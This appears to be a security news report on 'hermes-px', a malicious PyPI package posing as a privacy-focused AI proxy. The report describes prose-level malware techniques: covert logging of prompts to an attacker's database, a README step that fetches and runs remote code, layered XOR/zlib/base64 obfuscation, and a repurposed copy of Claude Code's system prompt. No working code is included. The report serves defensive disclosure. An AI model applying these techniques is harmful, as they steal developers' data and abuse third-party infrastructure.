Malicious PyPI Package ‘hermes-px’ Exploits Stolen Claude Prompt to Exfiltrate User Data
A recently uncovered Python package, ‘hermes-px’, has been found on the Python Package Index (PyPI) masquerading as a privacy-centric AI inference tool while clandestinely harvesting sensitive user data. This package falsely advertised itself as a Secure AI Inference Proxy that routes AI requests through the Tor network to ensure user anonymity. In reality, it exploited a private university’s internal AI endpoint, intercepted user messages, and exposed the actual IP addresses of unsuspecting users—all without their knowledge.
Deceptive Presentation and Functionality
The ‘hermes-px’ package was meticulously crafted to appear legitimate. It included comprehensive documentation, installation guides, code examples, a migration guide from the OpenAI Python SDK, and a functional Retrieval-Augmented Generation pipeline. The package was presented as a product of a fictitious company named EGen Labs, with an API interface closely mirroring that of OpenAI’s Python library. This convincing facade made it challenging for developers seeking free, privacy-focused AI tools to detect any malicious intent.
Discovery and Analysis
On April 5, 2026, JFrog Security researchers, led by Guy Korolevski, identified the deceptive nature of ‘hermes-px’. Their investigation revealed that the package covertly transmitted every user interaction to an attacker-controlled Supabase database, all while falsely claiming to provide end-to-end anonymity via the Tor network.
The primary targets of this malicious package were software developers working with AI models who were in search of free, user-friendly alternatives to paid SDKs. Once integrated into a project, every prompt sent by the developer was surreptitiously logged without any visible indication. Additionally, the package’s README included an Interactive Learning CLI section that instructed users to fetch and execute a Python script directly from a GitHub URL at runtime. This mechanism provided the attacker with a secondary channel for code execution, enabling the delivery of updated malicious payloads without the need to publish a new version of the package.
Exploitation of University Infrastructure
The ramifications of this attack extended beyond mere data collection. Users unknowingly utilized the private AI infrastructure of Universite Centrale, the largest private university in Tunisia, without the institution’s knowledge or consent. Compounding the issue, the data exfiltration process bypassed the Tor network entirely, using the victim’s direct internet connection and thereby exposing their real IP addresses—the very information ‘hermes-px’ purported to protect.
Utilization of Stolen Claude Prompt
Central to the operation of ‘hermes-px’ was a compressed file named ‘base_prompt.pz’, containing an extensive 246,000-character system prompt. Upon decompression, this prompt was found to be a near-complete copy of Anthropic’s proprietary Claude Code system prompt. The attacker attempted to rebrand it by replacing Claude with AXIOM-1 and Anthropic with EGen Labs. However, several references to Claude and Anthropic remained, along with specific function names, internal infrastructure markers, and sandbox filesystem paths unique to Claude.
This stolen prompt was injected into every API call, accompanied by encrypted payloads that mimicked academic advising chatbot instructions from the university’s internal service. To evade detection by security tools, the package employed a triple-layer obfuscation strategy: all sensitive strings were first XOR-encrypted with a 210-byte rotating key, then compressed using zlib, and finally encoded in base64.
Implications and Recommendations
The discovery of ‘hermes-px’ underscores the growing sophistication of supply chain attacks targeting open-source repositories. By exploiting the trust developers place in these platforms, malicious actors can distribute harmful packages that appear legitimate, making detection and prevention increasingly challenging.
To mitigate such risks, developers and organizations are advised to:
1. Verify Package Authenticity: Before integrating any package, especially those claiming to offer enhanced privacy or security features, thoroughly research its origin, maintainers, and user reviews.
2. Monitor Network Traffic: Implement monitoring tools to detect unusual data transmissions, particularly those directed toward unknown external servers.
3. Limit External Script Execution: Avoid executing scripts fetched directly from external sources without prior verification.
4. Regularly Update Dependencies: Keep all software dependencies up to date to benefit from the latest security patches and improvements.
5. Educate Development Teams: Provide ongoing training on the latest security threats and best practices for secure coding and package management.
By adopting these measures, developers can enhance their defenses against increasingly sophisticated supply chain attacks and protect both their projects and users from potential harm.
